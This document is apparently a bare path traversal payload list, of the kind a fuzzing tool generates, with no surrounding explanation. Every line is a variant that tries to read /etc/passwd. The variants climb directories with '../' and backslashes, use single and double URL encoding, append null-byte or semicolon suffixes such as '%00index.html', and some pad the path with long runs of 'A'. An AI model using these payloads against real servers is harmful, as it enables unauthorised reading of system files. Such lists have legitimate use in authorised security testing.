-%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd%00index.html -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd%00index.html -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd%00index.html -%252e%252e%252f/etc/passwd%00index.html -%252e%252e%252f%252e%252e%252f/etc/passwd%00index.html -%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd%00index.html -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd%00index.html -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd%00index.html -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd%00index.html -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd%00index.html -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd%00index.html -..\/etc/passwd%00index.html -..\..\/etc/passwd%00index.html -..\..\..\/etc/passwd%00index.html -..\..\..\..\/etc/passwd%00index.html -..\..\..\..\..\/etc/passwd%00index.html -..\..\..\..\..\..\/etc/passwd%00index.html -..\..\..\..\..\..\..\/etc/passwd%00index.html -..\..\..\..\..\..\..\..\/etc/passwd%00index.html -..%5c/etc/passwd%00index.html -..%5c..%5c/etc/passwd%00index.html -..%5c..%5c..%5c/etc/passwd%00index.html -..%5c..%5c..%5c..%5c/etc/passwd%00index.html -..%5c..%5c..%5c..%5c..%5c/etc/passwd%00index.html -..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd%00index.html -..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd%00index.html -..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd%00index.html -%2e%2e\/etc/passwd%00index.html -%2e%2e\%2e%2e\/etc/passwd%00index.html -%2e%2e\%2e%2e\%2e%2e\/etc/passwd%00index.html -%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd%00index.html -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd%00index.html -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd%00index.html -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd%00index.html -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd%00index.html -%2e%2e%5c/etc/passwd%00index.html -%2e%2e%5c%2e%2e%5c/etc/passwd%00index.html -%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd%00index.html -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd%00index.html -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd%00index.html -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd%00index.html -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd%00index.html -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd%00index.html -..%255c/etc/passwd%00index.html -..%255c..%255c/etc/passwd%00index.html -..%255c..%255c..%255c/etc/passwd%00index.html -..%255c..%255c..%255c..%255c/etc/passwd%00index.html -..%255c..%255c..%255c..%255c..%255c/etc/passwd%00index.html -..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd%00index.html -..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd%00index.html -..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd%00index.html -%252e%252e\/etc/passwd%00index.html -%252e%252e\%252e%252e\/etc/passwd%00index.html -%252e%252e\%252e%252e\%252e%252e\/etc/passwd%00index.html -%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd%00index.html -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd%00index.html -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd%00index.html -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd%00index.html -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd%00index.html -%252e%252e%255c/etc/passwd%00index.html -%252e%252e%255c%252e%252e%255c/etc/passwd%00index.html -%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd%00index.html -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd%00index.html -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd%00index.html -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd%00index.html -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd%00index.html -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd%00index.html -..//etc/passwd;index.html -../..//etc/passwd;index.html -../../..//etc/passwd;index.html -../../../..//etc/passwd;index.html -../../../../..//etc/passwd;index.html -../../../../../..//etc/passwd;index.html -../../../../../../..//etc/passwd;index.html -../../../../../../../..//etc/passwd;index.html -..%2f/etc/passwd;index.html -..%2f..%2f/etc/passwd;index.html -..%2f..%2f..%2f/etc/passwd;index.html -..%2f..%2f..%2f..%2f/etc/passwd;index.html -..%2f..%2f..%2f..%2f..%2f/etc/passwd;index.html -..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd;index.html -..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd;index.html -..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd;index.html -%2e%2e//etc/passwd;index.html -%2e%2e/%2e%2e//etc/passwd;index.html -%2e%2e/%2e%2e/%2e%2e//etc/passwd;index.html -%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd;index.html -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd;index.html -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd;index.html -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd;index.html -%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd;index.html -%2e%2e%2f/etc/passwd;index.html -%2e%2e%2f%2e%2e%2f/etc/passwd;index.html -%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd;index.html -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd;index.html -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd;index.html -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd;index.html -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd;index.html -%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd;index.html -..%252f/etc/passwd;index.html -..%252f..%252f/etc/passwd;index.html -..%252f..%252f..%252f/etc/passwd;index.html -..%252f..%252f..%252f..%252f/etc/passwd;index.html -..%252f..%252f..%252f..%252f..%252f/etc/passwd;index.html -..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd;index.html -..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd;index.html -..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f/etc/passwd;index.html -%252e%252e//etc/passwd;index.html -%252e%252e/%252e%252e//etc/passwd;index.html -%252e%252e/%252e%252e/%252e%252e//etc/passwd;index.html -%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd;index.html -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd;index.html -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd;index.html -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd;index.html -%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e//etc/passwd;index.html -%252e%252e%252f/etc/passwd;index.html -%252e%252e%252f%252e%252e%252f/etc/passwd;index.html -%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd;index.html -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd;index.html -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd;index.html -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd;index.html -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd;index.html -%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f/etc/passwd;index.html -..\/etc/passwd;index.html -..\..\/etc/passwd;index.html -..\..\..\/etc/passwd;index.html -..\..\..\..\/etc/passwd;index.html -..\..\..\..\..\/etc/passwd;index.html -..\..\..\..\..\..\/etc/passwd;index.html -..\..\..\..\..\..\..\/etc/passwd;index.html -..\..\..\..\..\..\..\..\/etc/passwd;index.html -..%5c/etc/passwd;index.html -..%5c..%5c/etc/passwd;index.html -..%5c..%5c..%5c/etc/passwd;index.html -..%5c..%5c..%5c..%5c/etc/passwd;index.html -..%5c..%5c..%5c..%5c..%5c/etc/passwd;index.html -..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd;index.html -..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd;index.html -..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd;index.html -%2e%2e\/etc/passwd;index.html -%2e%2e\%2e%2e\/etc/passwd;index.html -%2e%2e\%2e%2e\%2e%2e\/etc/passwd;index.html -%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd;index.html -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd;index.html -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd;index.html -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd;index.html -%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\/etc/passwd;index.html -%2e%2e%5c/etc/passwd;index.html -%2e%2e%5c%2e%2e%5c/etc/passwd;index.html -%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd;index.html -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd;index.html -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd;index.html -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd;index.html -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd;index.html -%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/etc/passwd;index.html -..%255c/etc/passwd;index.html -..%255c..%255c/etc/passwd;index.html -..%255c..%255c..%255c/etc/passwd;index.html -..%255c..%255c..%255c..%255c/etc/passwd;index.html -..%255c..%255c..%255c..%255c..%255c/etc/passwd;index.html -..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd;index.html -..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd;index.html -..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c/etc/passwd;index.html -%252e%252e\/etc/passwd;index.html -%252e%252e\%252e%252e\/etc/passwd;index.html -%252e%252e\%252e%252e\%252e%252e\/etc/passwd;index.html -%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd;index.html -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd;index.html -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd;index.html -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd;index.html -%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\/etc/passwd;index.html -%252e%252e%255c/etc/passwd;index.html -%252e%252e%255c%252e%252e%255c/etc/passwd;index.html -%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd;index.html -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd;index.html -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd;index.html -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd;index.html -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd;index.html -%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c/etc/passwd;index.html -\..//etc/passwd -\../\..//etc/passwd -\../\../\..//etc/passwd -\../\../\../\..//etc/passwd -\../\../\../\../\..//etc/passwd -\../\../\../\../\../\..//etc/passwd -\../\../\../\../\../\../\..//etc/passwd -\../\../\../\../\../\../\../\..//etc/passwd -/..\/etc/passwd -/..\/..\/etc/passwd -/..\/..\/..\/etc/passwd -/..\/..\/..\/..\/etc/passwd -/..\/..\/..\/..\/..\/etc/passwd -/..\/..\/..\/..\/..\/..\/etc/passwd -/..\/..\/..\/..\/..\/..\/..\/etc/passwd -/..\/..\/..\/..\/..\/..\/..\/..\/etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/..//etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../..//etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../..//etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../..//etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../..//etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../..//etc/passwd -AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../..//etc/passwd 